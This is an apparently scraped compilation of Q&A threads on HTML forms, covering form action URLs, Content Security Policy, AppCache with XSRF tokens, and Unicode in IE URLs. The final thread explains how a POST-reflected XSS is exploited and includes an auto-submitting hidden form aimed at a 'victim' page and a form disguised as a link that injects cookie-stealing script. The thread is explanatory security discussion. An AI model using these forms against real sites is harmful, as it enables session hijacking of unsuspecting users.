Node Express routes - Absolute URL vs Relative URL - node.js

I have a simple form of this type
<form name="keywords" action="www.mydomain.com:6161/articles" method="post">
<input type="text" name="keyword" />
<input type="submit" name="submit" value="Submit" />
</form>
The Express 4 routes for handling the form post, is as follows
app.post('/articles', routes.article.keyword);
The actual route file has the following
exports.keyword = function(req,res,next){
res.send(req.body.keyword);
};
Based on the above circumstances, when I post the form in the browser, I see a page “The address wasn’t understood”.
But, if I use relative URL in the form action i.e.,
It works perfect. Why so?
Because in reality, I sometimes may have to post data to a different domain or URL altogether.

I will post my comment as an answer as it helped.
In order for the action to work, you need to either specify full url, that include schema:
<form name="keywords" action="http://www.example.com/articles" method="post">
Or you can just use a relative url:
<form name="keywords" action="/articles" method="post">

a relative path is one not starting with a / (forward-slash)... generally, this will attempt to load from the current url's base dir (you can set this in html, though the browsers default to the 'dirname' of the url (e.g. 'img/something.gif' on a page at '/some/path/index.html' will fetch it from /some/path/img/something.gif').
an absolute path is one starting with a /. it will be loaded using the same schema, host and optionally, port,user, etc (full url syntax: scheme:[//[user:password#]host[:port]][/]path[?query][#fragment]... read more here: https://en.wikipedia.org/wiki/Uniform_Resource_Locator).
a full url is one starting with a schema (http/https/ftp,etc...)... however (this comes in handy): if you're going to be using the same schema (which keeps your site's security score high), you can skip it, along with the colon.
e.g.: while viewing a site from 'https://blah.net', and attempting to load a resource from google (analytics maybe), you can reference it as:
'//google.com/path/to/whatever'
this will use https if the page was loaded over https, or http if not... keeps you from having to determine the scheme that was used when rendering the page.

Related

Content Security Policy: Allow files after initial load?

The Content-Security-Policy header is, in theory, awesome. In practice, I've run into a problem. If a page loads the CSP and later you, for example, load a login page dynamically, the JS files for that page must have already been included. Because even if the login page uses an absolute URL which matches the domain the index page is from (And is set in the CSP for script-src), it will prevent it from loading.
When I used a nonce to try to circumvent this, the same issue arose, but it was intermittent. Sometimes it would let the same-nonce javascript file load in, and sometimes it wouldn't.
In case it's unclear, the dynamically-loaded script triggers CSP's idea of an "unsafe-inline script."
Is there a 100% effective way to load dynamic JS/CSS files with a strong CSP?
Freeform code example:
index.php:
<?php Header("Content-Security-Policy: default-src 'none'; script-src 'self' https://example.com"); ?>
<script src="triggerLogin.js"></script>
Login
<div class="futureLoginPage"></div>
triggerLogin.js: (CSP Allows)
$('.loginLink').on('click', function(event)
{
$('.futureLoginPage').load('/login.php');
event.stopPropagation();
event.preventDefault();
return false;
});
login.php:
<script src="https://example.com/loginFormVerify.js" type="text/javascript"></script>
<input type="text" class="user" placeholder="Username" />
<input type="text" class="pass" placeholder="Password" />
<input type="button" class="send" value="Send" />
<div class="authStatus"></div>
loginFormVerify.js: (CSP Forbids)
$('.send').on('click', function()
{
post("/verification.php", { user: $('.user').val(), pass: $('.pass').val() }, function(data)
{
$('.authStatus').html(data);
});
});
It doesn't matter if I use https://example.com/ in the 'post' functions, as CSP doesn't even load the loginFormVerify.js file, let alone check its contents.
In reverse, it doesn't matter if I remove https://example.com/ from the JS script sources to let it resolve to its own understanding of the domain. It still fails.
It doesn't matter if I add type="text/javascript" or type="application/javascript" to one or both of the tags, either. And as mentioned above, a nonce only intermittently helps on a dynamically-loaded JS file sent from the server.
While we're at it, it doesn't matter if I have ' ' around the domain name in the header.
Also, I can remove the </script> tags and use the below to the exact same result:
<script src="..." />
I've attempted the above connection style on Safari, Chrome and Firefox with identical results. Safari and Chrome on mobile as well.
I'm aware one workaround is to condense all JS functionality into a single file at the index.php level, but I'm curious if there's a way to handle this some other way.
I make no guarantees that the above example code works in any capacity and recognize the above snippet is far from best practice.
The point of the above code is exclusively to provide an example of how CSP fails to provide a desired result in a dynamic environment, for the purposes of the question:
Is there a 100% effective workaround without reducing CSP's useful nature, other than preloading all scripts (Which can be harmful to speed, maintenance, bandwidth, and -- for those that care -- SEO)?

How to use Appcache with web frameworks?

I have a problem about changing the main page, I use Tornado, and in Tornado, there is a special value which is generated everytime the server is reached, it is a token to avoid xsrf attack, but when I use .appcache file, the problem is that it caches everything! and I only show to cache static like css, js, fonts, here is what it contains:
CACHE MANIFEST
# v = 2
/static/css/meteo.css
/static/css/semantic.min.css
/static/js/jquery-2.1.1.min.js
/static/css/main.css
/static/js/semantic.min.js
/static/js/geo.js
/static/js/meteo.js
/static/fonts/icons.woff2
/static/fonts/icons.woff
/static/fonts/WeatherIcons-Regular.woff
NETWORK:
/
FALLBACK:
It doesent work, the / get cached!
So how to do this with new Framework, where it we dont make the html file in the route, but the uri that is bound to a function/class?
Here is a video I made about it
And it seems that the master is always cached :
Update: From this page, it is noway!
But, you say, why don’t we not cache the HTML file, but cache all the rest.
Well. AppCache has a concept of “master entries”. A master entry is an HTML file that includes a manifest attribute in the html element that points to a manifest file (which is the only way to create an HTML5 appcache BTW). Any such HTML file is automatically added to the cache. This makes sense a lot of the time, but not always. In particular, when an HTML document changes frequently, we won’t want it cached (as a stale version of the page will most likely be served to the user as we just saw).
Is there no way to over-​​ride this? Well, AppCache has the idea of a
NETWORK whitelist, which instructs the appcache to always use the
online version of a file. What if we add HTML files we don’t want
cached to this? Sorry, no dice. HTML files in a master entry stay
cached, even when included in the NETWORK whitelist. See what I mean.
Poor AppCache didn’t make these rules. He’s just following them
literally. He’s not a douchebag, he’s a pain in the %^&*, a total
“jobs-​​worth”.
I got the solution from here:
I made a hack.html which contains:
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<title>Hack 4 Manifest</title>
</head>
<body>
{% raw xsrf_form_html() %}
</body>
</html>
And then
Add this in the main page:
<iframe style='display: none;' src='/hack'></iframe>
And then in Tornado:
(r"/hack", handlers.Hack),
class Hack(MainHandler):
#tornado.gen.coroutine
def get(self):
self.render("hack.html")
And then I use the javascript call:
xsrf = $("iframe").contents().find("input").val()
$("#laat").html('<input id="lat" type="hidden" name="lat"></input><input type="hidden" name="_xsrf" value='+xsrf+'><input id="lon" type="hidden" name="lon"></input><input class="ui fluid massive yellow button" value="Get forecast" type="submit"/>');

IE sends ? character instead of Unicode characters in HTTP GET

I've created a web form for search operation in one of my projects, and the HTML is pretty simple:
<form action='/search' method="post">
<input type="text" id='search-term' name='search-term' />
<input type="submit" id='start-search' alt='' value="" />
</form>
So, when user types Unicode search term and hits Enter, an HTTP Get request would be sent to the server with this URL:
http://www.example.com/search?search-term=مثال
This, in server would be:
http://www.example.com/search?search-term=%D9%85%D8%AB%D8%A7%D9%84
and I'm able to retrieve the decoded value of the search-term query string using HttpContext.Current.Server.UrlDecode("%D9%85%D8%AB%D8%A7%D9%84") which returns مثال to me. Till here everything works fine and I have no problem.
However, if somebody type the aforementioned address directly in IE9, and hit Enter, then what I get at server is:
http://www.example.com/search?search-term=????
What's wrong here?
Update: We checked the traffic via Fiddler, and you can see the result in following pictures:
HTTP Get headers, captured by Fiddler, requested with Firefox
HTTP Get headers, captured by Fiddler, requested with IE
IE does not know what charset you want to use when typing the URL manually, so it has to use a default charset. ? characters occur when Unicode characters are converted to an Ansi charset that does not support those Unicode characters. When submitting a webform instead, IE uses the charset of the webform, which can be specified by the <form> tag itself, in <meta> tags within the HTML document, or the HTTP Content-Type header, so there is less chance that IE has to guess the correct charset to use.

Form GET no parameter name

<FORM METHOD=GET ACTION="../cgi-bin/mycgi.pl">
<INPUT NAME="town"><BR>
<INPUT TYPE=SUBMIT>
</FORM>
Will redirect us to
../cgi-bin/mycgi.pl?town=example
but I want to redirect to
../cgi-bin/mycgi.pl?example
It means, remove the parameter name in the URI?
I try to google, but found nothing like this.
Thanks in advance.
No, you cannot remove the parameter name in standard GET request.
Its a common way, how http request are made. All parameters must have a name and therefore it will be a couple (name=value) for each input.
What you are trying to achieve may acomplish javascript processing of the submitted form. Which will take the input named town and redirect user to such URL.
Something like:
<script type="text/javascript">
var elem = document.getElementById("town");
window.location = "path_to_script/mycgi.pl?"+elem.value
</script>
But in html you have to specify your town as following
<input type="text" name="town" id="town" />
GET will always post the variables with query string starting as ?variable=value&variable2=value2"
What you could do is have the form post to itself by removing the ACTION tag, and use method=post. Then parse $_REQUEST['POST'] and build the url you need, and redirect to the built url.

What methods are used to exploit XSS if a param echo'd is changed from GET to POST?

Examine this example. It is in PHP, but you should be able to pick up what is happening if you don't know PHP.
echo 'You searched for "' . $_GET['q'] . '"';
Now, obviously, this is a bad idea, if I request...
http://www.example.com/?q=<script type="text/javascript">alert('xss');</script>
OK, now I change that GET to a POST...
echo 'You searched for "' . $_POST['q'] . '"';
Now the query string in the URL won't work.
I know I can't use AJAX to post there, because of same domain policy. If I can run JavaScript on the domain, then it already has security problems.
One thing I thought of is coming across a site that is vulnerable to XSS, and adding a form which posts to the target site that submits on load (or, of course, redirecting people to your website which does this). This seems to get into CSRF territory.
So, what are the ways of exploiting the second example (using POST)?
Thanks
Here is an xss exploit for your vulnerable code. As you have aluded to, this is an identical attack pattern to POST based CSRF. In this case i am building the POST request as a form, and then I call .submit() on the form at the very bottom. In order to call submit, there must be a submit type in the form. The post request will immediately execute and the page will redirect, it is best to run post based csrf of exploits in an invisible iframe.
<html>
<form id=1 method="post" action="http://victim/vuln.php">
<input type=hidden name="q" value="<script>alert(/xss/)</script>">
<input type="submit">
</form>
</html>
<script>
document.getElementById(1).submit();//remote root command execution!
</script>
I also recommended reading about the sammy worm and feel free to ask any questions about other exploits I have written.
All I would need to do to exploit this is to get a user to click a form that sends a tainted "q" post variable. If I were being all nasty-like, I wouldcraft a form button that looks like a link (or even a link that gets written into a form POST with Javascript, sort of like how Rails does its link_to_remote stuff pre-3.0).
Imagine something like this:
<form id="nastyform" method="post" action="http://yoururl.com/search.php">
<input type="submit" value="Click here for free kittens!">
<input type="hidden" name="q" value="<script>alert('My nasty cookie-stealing Javascript')</script>" />
</form>
<style>
#nastyform input {
border: 0;
background: #fff;
color: #00f;
padding: 0;
margin: 0;
cursor: pointer;
text-decoration: underline;
}
</style>
If I can get a user to click that (thinking that he's clicking some innocent link), then I can post arbitrary data to the search that then gets echoed into his page, and I can hijack his session or do whatever other nasty things I want.
Post data isn't inherently more secure than get data; it's still user input and absolutely cannot be trusted.
CSRF attacks are a different class of attack, where some legitimate action is initiated without the permission of the user; this has the same sort of entry vector, but it's a classic XSS attack, designed to result in the injection of malicious Javascript into the page for the purpose of gaining session access or something similarly damaging.

Resources